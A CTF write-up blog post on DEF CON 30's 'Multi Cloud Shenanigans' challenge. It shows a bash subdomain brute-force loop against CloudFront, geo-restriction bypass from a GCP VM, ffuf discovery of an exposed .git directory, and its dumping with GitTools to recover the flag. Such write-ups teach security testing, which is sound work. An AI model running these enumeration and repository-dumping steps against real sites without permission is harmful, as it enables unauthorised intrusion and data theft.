2022 Cloud Village CTF at DEF CON 30 - Multi Cloud Shenanigans

-


"Clair is a Google Cloud Administrator at PeopleBack Corp in California. Her company has acquired a product and to provide more availability to the customers they had to go multi-cloud setup.

The appication is not available to their customer outside California. Can you find the issue and get the content of the site?"


Hint

PeopleBackCorp recently acquired BeoShaft



After the hint was released, I finally had a hit using the Code Search feature on sourcegraph.com for one of the terms relating to the challenge: BeoShaft

From there, I browsed directly to https://github.com/BeoShaft and clicked through the small amount of contents in the repo until I saw this image:

"Word Art.jpeg"

The string "dc5vf5almyxxx" caught my attention right away. At first I thought this may be part of a URL for a lambda function. I crossed checked its length with a function that exists in my personal account and they didn't add up. Even if I removed the X's at the end of the string I still wouldn't know the function name. I went back to the image and looked for anything that might be a lambda function name. But then I was distracted by the string "cloudfront."

I know from working with cloudfront a bit that this could be a solid lead. I went back to my account and counted the characters and saw that they were the same. 

To figure out the values for "xxx," I used the following script to generate all possible combinations of lower case characters and numbers:

$ cat permute.sh

#!/bin/bash

charset=({a..z} {0..9})

permute(){

  (($1 == 0)) && { echo "$2"; return; }

  for char in "${charset[@]}"

  do

    permute "$((${1} - 1 ))" "$2$char"

  done

}

permute "$1"


$ permute.sh 3 >> list.txt

$ wc -l list.txt 

46656 list.txt


The math checked out; so I then started screen and ended up using a super slow for-loop:


$ for i in $(<list.txt);do echo >>results.txt && echo $i >> results.txt && curl -SI https://dc5vf5almy$i.cloudfront.net/ >>results.txt;done


Once this was finished, I looked at results.txt where I saw only one 403:


$ grep 403 results.txt -B1
sbn
HTTP/2 403 


I struggled more than I'd like to admit here; seeing how I had a similar experience with last year's "Sweating It Out" challenge. But, I realized I was targeting an AWS URL from an AWS instance and that the challenge was called "Multi Cloud Shenanigans." 


So I switched over to GCP and I sent a request from a VM in the Los Angelas region, and then I was able to successfully connect to the target site. 


Ultimately, I used ffuf to perform content discovery:

$ ./go/bin/ffuf -u https://dc5vf5almysbn.cloudfront.net/FUZZ -w SecLists/Discovery/Web-Content/common.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
       v1.5.0-dev
________________________________________________
 :: Method           : GET
 :: URL              : https://dc5vf5almysbn.cloudfront.net/FUZZ
 :: Wordlist         : FUZZ: SecLists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
.git/config             [Status: 200, Size: 150, Words: 14, Lines: 9, Duration: 14ms]
.git/HEAD               [Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 109ms]
.git/index              [Status: 200, Size: 4450, Words: 27, Lines: 33, Duration: 150ms]
<SNIP>



Finding .git directories is always fun. I then used GitTool's gitdumper.sh against the target:


$ ./gitdumper.sh https://dc5vf5almysbn.cloudfront.net/.git dump1

Then, I used extractor.sh so I could grep through the contents:


$ ./extractor.sh ../Dumper/dump1 extract1


Finally, I grep'd for the flag:


$ grep -Ri flag- extract1/
extract1/2-6a60b5b7d330906c2a152f619bdf4dbbbaf75013/pricing/index.html:        <p class="mb-4">Let&rsquo;s talk about your requirements over a call - FLAG-{hk04MwP7XrTlu9QGyYQ0BP3SMILDr3Bx}</p>

Thanks for reading!

@strupo_

Find us on twitter: @teamWTG

Popular posts from this blog

The Audacity of Some CTFs

-
Image
2021 Update : This is currently the most read post on our blog. Chances are that you are here because you are working on an audio challenge. If you see something looking like a digital signal, be sure to also check out our Radioactive Man write-up. I have stumbled across a few audio files while competing in CTFs over the last few years and I thought covering spectrograms would make a nice and quick blog post. Flags can manifest themselves in many ways when dealing with media files. One of the most common ways I have seen is by hiding them, or clues to find them, in the file's audio spectrogram. According to wikipedia: "a spectrogram is a visual representation of the spectrum of frequencies of sound, or other signals, as they vary with time." Basically, it is a method to visualize sound and signals. I first learned that you can embed hidden messages and images in a spectrogram when a friend showed me an image from an Aphex Twin song some years ago. Equation by
Read more

Code Name: Treehouse of Horror CTF

-
Image
A friend of mine asked me if I wanted to participate, on the sly, in an internal CTF that he put together for his employer. My score wouldn't be shown, and for all intents and purposes I did not compete. I figured I'd give it a code name incase I need to refer to this event. Let's call it the Treehouse of Horror CTF. The Treehouse of Horror CTF! The scoreboard appeared to be similar to the one used at the Defcon 26 IoT CTF, however this one was organized by challenge which made things nice for tracking your own progress versus one huge board of challenges.  I think this is called Jeopardy style. There were some odd moments at times because different challenge groups shared a target, so you had to identify which flag went with which challenge. Really not that big of a deal and I actually really enjoyed the format rather than just a single submit field like at derby or Eversec's CTF as it helped me track my progress with ease. The challenges were: FreePBX Re
Read more

2020 HTH CTF - Cloud Challenges

-
Image
Last weekend, @strupo_ joined team NiSec to participate in the HTH 2020 CTF  and together they got on the podium in third place! 2020 HTH CTF - Final Scoreboard The challenge categories included:  Cloud Crypto Forensics Kali 101  Misc Pwnables Recon Reverse Engineering Steganography Web Recently, strupo_ was fortunate enough to remotely attend  Breaching the Cloud Perimeter w/Beau Bullock . As cloud testing is still very new to him, and this blog tends to focus on introductory concepts and challenges, we thought it would be appropriate to try and tackle all of the cloud challenges in this post. Okay, let's get into it. The Cloud category had three challenges: BucketList (100) OhSnap! (150) Serving Less (250) BucketList Hey guys! I set up an AWS bucket for this year's hth that we can use to store our flags for the ctf. I think I made the bucket private but I'm not very good at this cloud stuff. Send me a message if I need to edit the permissions. Hint: Let's keep a flag
Read more